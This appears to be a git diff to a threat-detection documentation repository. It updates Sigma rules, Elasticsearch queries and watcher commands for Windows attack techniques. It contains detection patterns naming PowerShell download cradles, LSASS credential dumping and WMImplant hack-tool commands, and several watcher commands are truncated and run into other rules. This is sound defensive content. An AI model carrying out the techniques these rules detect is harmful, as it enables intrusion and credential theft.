diff --git a/Atomic_Threat_Coverage/Data_Needed/DN_0050_1102_audit_log_was_cleared.md b/Atomic_Threat_Coverage/Data_Needed/DN_0050_1102_audit_log_was_cleared.md
index 1fcbaf1..f71b510 100644
--- a/Atomic_Threat_Coverage/Data_Needed/DN_0050_1102_audit_log_was_cleared.md
+++ b/Atomic_Threat_Coverage/Data_Needed/DN_0050_1102_audit_log_was_cleared.md
@@ -1,8 +1,8 @@
| Title | DN_0050_1102_audit_log_was_cleared |
|:-------------------|:------------------|
-| **Description** | This event generates every time Windows Security audit log was cleared |
+| **Description** | Event 1102 is created whenever the Security log is cleared, REGARDLESS of the status of the Audit System Events audit policy |
| **Logging Policy** | |
-| **References** | - [https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md)
|
+| **References** | - [https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md)
- [https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102)
|
| **Platform** | Windows |
| **Type** | Windows Log |
| **Channel** | Security |
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_download.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_download.md
index a013b38..0f0d8ad 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_download.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_download.md
@@ -26,15 +26,20 @@ tags:
- attack.t1086
author: Florian Roth
date: 2017/03/05
+modified: 2020/03/25
logsource:
product: windows
service: powershell
detection:
- keywords:
- Message:
- - '*System.Net.WebClient).DownloadString(*'
- - '*system.net.webclient).downloadfile(*'
- condition: keywords
+ downloadfile:
+ Message|contains|all:
+ - 'System.Net.WebClient'
+ - '.DownloadFile('
+ downloadstring:
+ Message|contains|all:
+ - 'System.Net.WebClient'
+ - '.DownloadString('
+ condition: downloadfile or downloadstring
falsepositives:
- PowerShell scripts that download content from the Internet
level: medium
@@ -48,42 +53,42 @@ level: medium
### es-qs
```
-Message.keyword:(*System.Net.WebClient\\).DownloadString\\(* OR *system.net.webclient\\).downloadfile\\(*)
+(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\\(* OR Message.keyword:*.DownloadString\\(*))
```
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/65531a81-a694-4e31-ae04-f8ba5bc33759 <[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004) |
+| **ATT&CK Technique** | This Detection Rule wasn't mapped to ATT&CK Technique yet |
+| **Data Needed** | - [DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)
|
+| **Trigger** | There is no documented Trigger for this Detection Rule yet |
+| **Severity Level** | high |
+| **False Positives** | - System administrator create Powershell profile manually
|
+| **Development Status** | experimental |
+| **References** | - [https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/](https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/)
|
+| **Author** | HieuTT35 |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: Powershell Profile.ps1 Modification
+id: b5b78988-486d-4a80-b991-930eff3ff8bf
+status: experimental
+description: Detects a change in profile.ps1 of the Powershell profile
+references:
+ - https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
+author: HieuTT35
+date: 2019/10/24
+modified: 2020/04/03
+logsource:
+ product: windows
+ service: sysmon
+detection:
+ event:
+ EventID: 11
+ target1:
+ TargetFilename|contains|all:
+ - '\My Documents\PowerShell\'
+ - '\profile.ps1'
+ target2:
+ TargetFilename|contains|all:
+ - 'C:\Windows\System32\WindowsPowerShell\v1.0\'
+ - '\profile.ps1'
+ condition: event and (target1 or target2)
+falsepositives:
+ - System administrator create Powershell profile manually
+level: high
+tags:
+ - attack.persistence
+ - attack.privilege_escalation
+
+```
+
+
+
+
+
+### es-qs
+
+```
+(EventID:"11" AND TargetFilename.keyword:*\\\\profile.ps1* AND (TargetFilename.keyword:*\\\\My\\ Documents\\\\PowerShell\\* OR TargetFilename.keyword:*C\\:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\*))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b5b78988-486d-4a80-b991-930eff3ff8bf <[TA0002: Execution](https://attack.mitre.org/tactics/TA0002) |
+| **ATT&CK Technique** | - [T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
|
+| **Data Needed** | - [DN_0036_4104_windows_powershell_script_block](../Data_Needed/DN_0036_4104_windows_powershell_script_block.md)
|
+| **Trigger** | - [T1047: Windows Management Instrumentation](../Triggers/T1047.md)
|
+| **Severity Level** | high |
+| **False Positives** | - Administrative scripts that use the same keywords.
|
+| **Development Status** | experimental |
+| **References** | - [https://github.com/FortyNorthSecurity/WMImplant](https://github.com/FortyNorthSecurity/WMImplant)
|
+| **Author** | NVISO |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: WMImplant Hack Tool
+id: 8028c2c3-e25a-46e3-827f-bbb5abf181d7
+status: experimental
+description: Detects parameters used by WMImplant
+references:
+ - https://github.com/FortyNorthSecurity/WMImplant
+tags:
+ - attack.execution
+ - attack.t1047
+author: NVISO
+date: 2020/03/26
+logsource:
+ product: windows
+ service: powershell
+ description: "Script block logging must be enabled"
+detection:
+ selection:
+ ScriptBlockText|contains:
+ - "WMImplant"
+ - " change_user "
+ - " gen_cli "
+ - " command_exec "
+ - " disable_wdigest "
+ - " disable_winrm "
+ - " enable_wdigest "
+ - " enable_winrm "
+ - " registry_mod "
+ - " remote_posh "
+ - " sched_job "
+ - " service_mod "
+ - " process_kill "
+ # - " process_start "
+ - " active_users "
+ - " basic_info "
+ # - " drive_list "
+ # - " installed_programs "
+ - " power_off "
+ - " vacant_system "
+ - " logon_events "
+ condition: selection
+falsepositives:
+ - Administrative scripts that use the same keywords.
+level: high
+
+```
+
+
+
+
+
+### es-qs
+
+```
+ScriptBlockText.keyword:(*WMImplant* OR *\\ change_user\\ * OR *\\ gen_cli\\ * OR *\\ command_exec\\ * OR *\\ disable_wdigest\\ * OR *\\ disable_winrm\\ * OR *\\ enable_wdigest\\ * OR *\\ enable_winrm\\ * OR *\\ registry_mod\\ * OR *\\ remote_posh\\ * OR *\\ sched_job\\ * OR *\\ service_mod\\ * OR *\\ process_kill\\ * OR *\\ active_users\\ * OR *\\ basic_info\\ * OR *\\ power_off\\ * OR *\\ vacant_system\\ * OR *\\ logon_events\\ *)
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/8028c2c3-e25a-46e3-827f-bbb5abf181d7 < kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain
routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious.
status: experimental
-date: 27/10/2019
+date: 2019/10/27
author: Perez Diego (@darkquassar), oscd.community
references:
- https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_minidumwritedump_lsass.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_minidumwritedump_lsass.md
index 22d8ec0..1a6ac7e 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_minidumwritedump_lsass.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/sysmon_minidumwritedump_lsass.md
@@ -23,7 +23,7 @@ status: experimental
description: Detects the use of MiniDumpWriteDump API for dumping lsass.exe memory in a stealth way. Tools like ProcessHacker and some attacker tradecract use this
API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and
transfer it over the network back to the attacker's machine.
-date: 27/10/2019
+date: 2019/10/27
modified: 2019/11/13
author: Perez Diego (@darkquassar), oscd.community
references:
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_possible_dns_rebinding.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_possible_dns_rebinding.md
index 46f593c..0fbc1ed 100644
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_possible_dns_rebinding.md
+++ b/Atomic_Threat_Coverage/Detection_Rules/sysmon_possible_dns_rebinding.md
@@ -79,7 +79,7 @@ level: medium
### xpack-watcher
```
-curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/eb07e747-2552-44cd-af36-b659ae0958e4 <100. (DNS-record will saved in host cache for a while TTL).",\n "tags": [\n "attack.command_and_control",\n "attack.t1043"\n ],\n "query": "(EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\" AND QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*) AND (EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\") AND (NOT (QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30s"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\" AND QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*) AND (EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\") AND (NOT (QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "ComputerName.keyword",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 4\n },\n "aggs": {\n "agg": {\n "terms": {\n "field": "QueryName.keyword",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 4\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.agg.buckets.0.doc_count": {\n "gt": 3\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Possible DNS Rebinding\'",\n "body": "Hits:\\n{{#aggregations.agg.buckets}}\\n {{key}} {{doc_count}}\\n\\n{{#by.buckets}}\\n-- {{key}} {{doc_count}}\\n{{/by.buckets}}\\n\\n{{/aggregations.agg.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/eb07e747-2552-44cd-af36-b659ae0958e4 <100. (DNS-record will saved in host cache for a while TTL).",\n "tags": [\n "attack.command_and_control",\n "attack.t1043"\n ],\n "query": "(EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\" AND QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*) AND (EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\") AND (NOT (QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30s"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\" AND QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*) AND (EventID:\\"22\\" AND QueryName.keyword:* AND QueryStatus:\\"0\\") AND (NOT (QueryResults.keyword:(\\\\(\\\\:\\\\:ffff\\\\:\\\\)?10.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?192.168.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.16.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.17.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.18.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.19.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.20.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.21.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.22.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.23.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.24.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.25.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.26.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.27.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.28.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.29.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.30.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?172.31.* OR \\\\(\\\\:\\\\:ffff\\\\:\\\\)?127.*))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "ComputerName",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 4\n },\n "aggs": {\n "agg": {\n "terms": {\n "field": "QueryName",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 4\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.agg.buckets.0.doc_count": {\n "gt": 3\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Possible DNS Rebinding\'",\n "body": "Hits:\\n{{#aggregations.agg.buckets}}\\n {{key}} {{doc_count}}\\n\\n{{#by.buckets}}\\n-- {{key}} {{doc_count}}\\n{{/by.buckets}}\\n\\n{{/aggregations.agg.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_susp_adsi_cache_usage.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_susp_adsi_cache_usage.md
new file mode 100644
index 0000000..e697218
--- /dev/null
+++ b/Atomic_Threat_Coverage/Detection_Rules/sysmon_susp_adsi_cache_usage.md
@@ -0,0 +1,99 @@
+| Title | Suspicious ADSI-Cache Usage By Unknown Tool |
+|:-------------------------|:------------------|
+| **Description** | detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger. |
+| **ATT&CK Tactic** | - [TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)
|
+| **ATT&CK Technique** | - [T1041: Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041)
|
+| **Data Needed** | - [DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)
|
+| **Trigger** | - [T1041: Exfiltration Over Command and Control Channel](../Triggers/T1041.md)
|
+| **Severity Level** | high |
+| **False Positives** | - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.
|
+| **Development Status** | experimental |
+| **References** | - [https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961](https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961)
- [https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/](https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/)
- [https://github.com/fox-it/LDAPFragger](https://github.com/fox-it/LDAPFragger)
|
+| **Author** | xknow @xknow_infosec |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: Suspicious ADSI-Cache Usage By Unknown Tool
+id: 75bf09fa-1dd7-4d18-9af9-dd9e492562eb
+description: detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.
+status: experimental
+date: 2019/03/24
+author: xknow @xknow_infosec
+references:
+ - https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961
+ - https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/
+ - https://github.com/fox-it/LDAPFragger
+tags:
+ - attack.t1041
+ - attack.persistence
+logsource:
+ product: windows
+ service: sysmon
+detection:
+ selection_1:
+ EventID: 11
+ TargetFilename: '*\Local\Microsoft\Windows\SchCache\*.sch'
+ selection_2:
+ Image|contains:
+ - 'C:\windows\system32\svchost.exe'
+ - 'C:\windows\system32\dllhost.exe'
+ - 'C:\windows\system32\mmc.exe'
+ - 'C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe'
+ condition: selection_1 and not selection_2
+falsepositives:
+ - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.
+level: high
+
+```
+
+
+
+
+
+### es-qs
+
+```
+((EventID:"11" AND TargetFilename.keyword:*\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\*.sch) AND (NOT (Image.keyword:(*C\\:\\\\windows\\\\system32\\\\svchost.exe* OR *C\\:\\\\windows\\\\system32\\\\dllhost.exe* OR *C\\:\\\\windows\\\\system32\\\\mmc.exe* OR *C\\:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe*))))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/75bf09fa-1dd7-4d18-9af9-dd9e492562eb <[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003) |
+| **ATT&CK Technique** | - [T1023: Shortcut Modification](https://attack.mitre.org/techniques/T1023)
|
+| **Data Needed** | - [DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)
|
+| **Trigger** | - [T1023: Shortcut Modification](../Triggers/T1023.md)
|
+| **Severity Level** | medium |
+| **False Positives** | - Operations performed through Windows SCCM or equivalent
|
+| **Development Status** | experimental |
+| **References** | - [https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/](https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/)
|
+| **Author** | Maxime Thiebaut (@0xThiebaut) |
+
+
+## Detection Rules
+
+### Sigma rule
+
+```
+title: Suspicious desktop.ini Action
+id: 81315b50-6b60-4d8f-9928-3466e1022515
+status: experimental
+description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
+references:
+ - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/
+author: Maxime Thiebaut (@0xThiebaut)
+date: 2020/03/19
+tags:
+ - attack.persistence
+ - attack.t1023
+logsource:
+ product: windows
+ service: sysmon
+detection:
+ filter:
+ Image:
+ - 'C:\Windows\explorer.exe'
+ - 'C:\Windows\System32\msiexec.exe'
+ - 'C:\Windows\System32\mmc.exe'
+ selection:
+ EventID: 11
+ TargetFilename|endswith: '\desktop.ini'
+ condition: selection and not filter
+falsepositives:
+ - Operations performed through Windows SCCM or equivalent
+level: medium
+
+```
+
+
+
+
+
+### es-qs
+
+```
+((EventID:"11" AND TargetFilename.keyword:*\\\\desktop.ini) AND (NOT (Image:("C\\:\\\\Windows\\\\explorer.exe" OR "C\\:\\\\Windows\\\\System32\\\\msiexec.exe" OR "C\\:\\\\Windows\\\\System32\\\\mmc.exe"))))
+```
+
+
+### xpack-watcher
+
+```
+curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/81315b50-6b60-4d8f-9928-3466e1022515 <[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003) |
| **ATT&CK Technique** | - [T1100: Web Shell](https://attack.mitre.org/techniques/T1100)
|
